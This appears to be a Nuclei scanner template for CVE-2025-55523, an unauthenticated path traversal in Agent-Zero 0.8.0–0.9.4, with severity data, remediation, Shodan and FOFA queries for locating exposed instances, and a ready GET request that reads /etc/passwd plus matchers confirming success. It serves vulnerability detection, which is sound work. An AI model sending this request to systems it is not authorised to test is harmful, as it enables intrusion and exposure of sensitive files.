id: CVE-2025-55523 info: name: Agent-Zero 0.8.0 - 0.9.4 - Arbitrary File Download author: 0x_Akoko severity: high description: | Agent-Zero v0.8.0 - 0.9.4 contains a path traversal caused by improper validation in /api/download_work_dir_file.py, letting attackers access unauthorized files, exploit requires crafted request. impact: | Attackers can access unauthorized files, potentially exposing sensitive data or system information. remediation: | Update to the latest version of Agent-Zero reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-55523 - https://github.com/agent0ai/agent-zero/issues/687 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: verified: true max-request: 1 shodan-query: title:"Agent Zero" fofa-query: title="Agent Zero" tags: cve,cve2025,agent-zero,lfi,traversal,unauth,vkev http: - method: GET path: - "{{BaseURL}}/download_work_dir_file?path=/etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "filename=passwd" - type: status status: - 200 # digest: 4b0a00483046022100a99183c0b09b23ccd5814f8c6f2cb7af938f6e56555bc6ba3d861b2613444e960221008681ebb27ea0b4a2a18dffd5aa51ae8a9da9d5c47b13a84fcd521a54f7fd4c51:922c64590222798bb761d5b6d8e72950